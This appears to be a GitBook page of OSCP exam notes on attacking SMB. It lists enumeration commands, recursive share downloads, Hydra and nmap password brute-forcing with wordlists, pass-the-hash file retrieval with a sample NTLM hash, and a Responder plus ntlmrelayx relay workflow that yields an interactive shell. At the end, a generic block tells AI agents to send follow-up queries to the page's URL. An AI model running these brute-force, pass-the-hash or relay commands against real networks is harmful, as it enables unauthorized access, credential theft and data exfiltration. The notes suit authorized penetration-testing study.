# SMB List of SMB versions and corresponding Windows versions: 1. SMB1 – Windows 2000, XP and Windows 2003. 2. SMB2 – Windows Vista SP1 and Windows 2008 3. SMB2.1 – Windows 7 and Windows 2008 R2 4. SMB3 – Windows 8 and Windows 2012. #### ENUM4LINUX ``` enum4linux -a $ip enum4linux -u user_name -p password $ip #enum with user account enum4linux -U $ip #list usernames enum4linux -S #list shares enum4linux -o remote_host #get Os information ``` #### NMAP/SMBCLIENT/SMBMAP ``` #ENUM OS, computer name, domain, workgroup, and current time over the SMB protocol nmap -v -p 139,445 --script smb-os-discovery $ip #LIST SHARES nmap --script smb-enum-shares -p 139,445 $ip smbclient -L \\\\$ip\\ smbclient -L \\$ip --option='client min protocol=NT1' #if NT_STATUS_CONNECTION_DISCONNECTED smbmap -H $ip #LIST FILES smbclient //$ip/PATH -c 'recurse;ls' net view \\dc01 /all smbmap -H $ip -R $sharename #CONNECT TO SHARE smbclient -U '%' -L //$ip smbclient -U 'guest%' -L //$ip smbclient \\\\192.168.1.101\\C$ smbclient \\\\192.168.1.101\\C$ --option='client min protocol=NT1' smbclient \\\\192.168.1.101\\admin$ -U username ``` #### DOWNLOAD FILES ``` smb: \> RECURSE ON smb: \> PROMPT OFF smb: \> mget * # With smbclient smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q # Downloads a file in quiet mode smbmap -u Administrator -p aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 -H $ip -s wwwroot -R -A '.*' # download everything recursively in the wwwroot share to /usr/share/smbmap. great when smbclient doesnt work ``` #### MOUNT SHARES LOCALLY ``` sudo mount -t cifs -o 'user=guest' //$ip/share /mnt/share sudo mount -t cifs -o 'username=user,password=password' //$ip/sharename /mnt ls /mnt/share -laR #recurse listing of all dirs ``` #### BRUTE FORCE SHARE ``` hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv ``` ### SMB Relay - AD Relay hash to another machine, that allow to gain access. Require user’s hash to be admin on the target and smb singing must be disabled on the target. ``` #1. Check for smb with signing disabled nmap --script=smb2-security-mode.nse -p445 $net --open #2. Turn off responder for http and smb, just listen and answer for fake request #to relay hash to another machine sudo vim /etc/responder/Responder.conf #3. Run responder sudo responder -A -I eth0 -v #4. Run ntlmrelayx to take hash from responder and relay it to another machine impacket-ntlmrelayx -tf targets.txt -smb2support #5. Get SAM local hashes #To get smb shell, allowing to put file, change password, use shared etc. impacket-ntlmrelayx -tf targets.txt -smb2support -i nc 127.0.0.1 11000 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://oscp-notes-2025.gitbook.io/oscp+-notes-2025/services/smb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.